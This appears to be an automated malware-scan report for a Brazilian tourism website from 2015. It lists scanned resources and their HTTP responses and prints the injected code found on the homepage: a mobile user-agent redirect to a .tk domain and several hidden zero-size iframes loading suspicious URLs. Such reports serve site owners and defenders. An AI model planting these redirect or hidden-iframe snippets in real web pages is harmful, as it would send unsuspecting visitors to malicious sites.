Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=visiteceara.com.br
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.visiteceara.com.br/ | HTTP/1.1 307 Temporary Redirect Connection: close Date: Sat, 28 Feb 2015 09:48:21 GMT Location: http://visiteceara.com/ Server: nginx Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://visiteceara.com/ | 200 OK Content-Length: 62619 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://azma.tk/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://is.gd/u9kpsg <iframe src="http://is.gd/u9kpsg" width="0" height="0" frameborder="0"> Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> Hidden iFrame found. size: 0x0 src: http://cort.as/o2ak <iframe src="http://cort.as/o2ak" width="0" height="0" frameborder="0"> | ||
http://visiteceara.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://visiteceara.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://clickunderad.com/pop-10290-1.js | 410 Gone Content-Length: 391 Content-Type: text/html | clean |
http://clickunderad.com/test404page.js | 410 Gone Content-Length: 391 Content-Type: text/html | clean |
http://activepr.ru/js/bodyclick.php?id=11762 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://kromeleta.ru/8xm6cm90jtn6stotdwrw465jupvhg4gus4cga9tfp | 200 OK Content-Length: 9628 Content-Type: text/javascript | clean |
http://kromeleta.ru/6mgxu1j2d0b6vlgp7eftxy80ji5p5ejbo6jdis0g4 | 200 OK Content-Length: 9644 Content-Type: text/javascript | clean |
http://symfomob.com/js.php?sid=1783&traffic=all&mts_land=1&beeline_land=37&megafon_land=26 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 28 Feb 2015 09:48:29 GMT Pragma: no-cache Location: http://cdn10.jump-wap.com/?sid=1783&land=26&type=js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=b501fff248763438b35a10d1bab042fb; path=/ X-Powered-By: PHP/5.3.29 | clean |
http://cdn10.jump-wap.com/?sid=1783&land=26&type=js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://symfomob.com/js.php?sid=1783&traffic=all&mts_land=76&beeline_land=28&megafon_land=26 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 28 Feb 2015 09:48:30 GMT Pragma: no-cache Location: http://cdn10.jump-wap.com/?sid=1783&land=26&type=js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9799ad70cbe4ceba0961b07d2060c4bb; path=/ X-Powered-By: PHP/5.3.29 | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.10.1/jquery.min.js | 200 OK Content-Length: 93057 Content-Type: text/javascript | clean |
http://visiteceara.com/wp-content/themes/convention/js/vendor/jquery.carouFredSel-6.2.1-packed.js | 200 OK Content-Length: 54780 Content-Type: application/x-javascript | clean |
http://visiteceara.com/wp-content/themes/convention/js/vendor/jscal/jCal.js | 200 OK Content-Length: 14521 Content-Type: application/x-javascript | clean |
http://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js | 200 OK Content-Length: 228078 Content-Type: application/javascript | clean |
http://visiteceara.com/wp-content/themes/convention/js/main.js | 200 OK Content-Length: 8091 Content-Type: application/x-javascript | clean |
http://visiteceara.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: visiteceara.com.br
Result:
GET / HTTP/1.1
Host: visiteceara.com.br
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: visiteceara.com.br
Referer: http://www.google.com/search?q=visiteceara.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: visiteceara.com.br
Referer: http://www.google.com/search?q=visiteceara.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.